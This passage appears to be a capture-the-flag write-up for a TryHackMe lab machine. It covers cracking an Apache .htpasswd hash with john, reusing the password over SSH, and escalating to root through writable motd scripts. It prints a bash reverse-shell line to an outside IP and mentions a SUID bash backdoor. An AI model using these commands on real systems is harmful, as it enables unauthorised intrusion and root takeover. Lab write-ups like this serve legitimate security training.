With cat .htpasswd we can find a user hash for apache: james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1.
It may be worth to crack if it is re-used for SSH.
1 2 3 4 5 6 7 8 9
$ john --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=md5crypt-long hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status j<edited>a (james) 1g 0:00:00:00 DONE (2021-07-27 16:59) 50.00g/s 32000p/s 32000c/s 32000C/s evelyn..pebbles Use the "--show" option to display all of the cracked passwords reliably Session completed
$ ssh firstname.lastname@example.org The authenticity of host 'debug.thm (10.10.146.9)' can't be established. ED25519 key fingerprint is SHA256:j1rsa6H3aWAH+1ivgTwsdNPBDEJU72p3MUWbcL70JII. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'debug.thm' (ED25519) to the list of known hosts. email@example.com's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)
As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it?
But there's still one thing I'd like you to do, before the submission.
Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D
I gave you access to modify all these files :)
Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!
We have the permission for all motd files:
1 2 3 4 5 6 7 8 9 10
james@osboxes:~$ ls -lhA /etc/update-motd.d/ total 28K -rwxrwxr-x 1 root james 1.2K Mar 10 18:32 00-header -rwxrwxr-x 1 root james 0 Mar 10 18:38 00-header.save -rwxrwxr-x 1 root james 1.2K Jun 14 2016 10-help-text -rwxrwxr-x 1 root james 97 Dec 7 2018 90-updates-available -rwxrwxr-x 1 root james 299 Jul 22 2016 91-release-upgrade -rwxrwxr-x 1 root james 142 Dec 7 2018 98-fsck-at-reboot -rwxrwxr-x 1 root james 144 Dec 7 2018 98-reboot-required -rwxrwxr-x 1 root james 604 Nov 5 2017 99-esm
We can append a reverse shell (/bin/bash -i >& /dev/tcp/10.9.19.77/9001 0>&1) to any of thus file (eg. 00-header)
and when any user will connect it will be executed with root permission.
It wasn't working with reverse shells so I made a BASH SUID instead.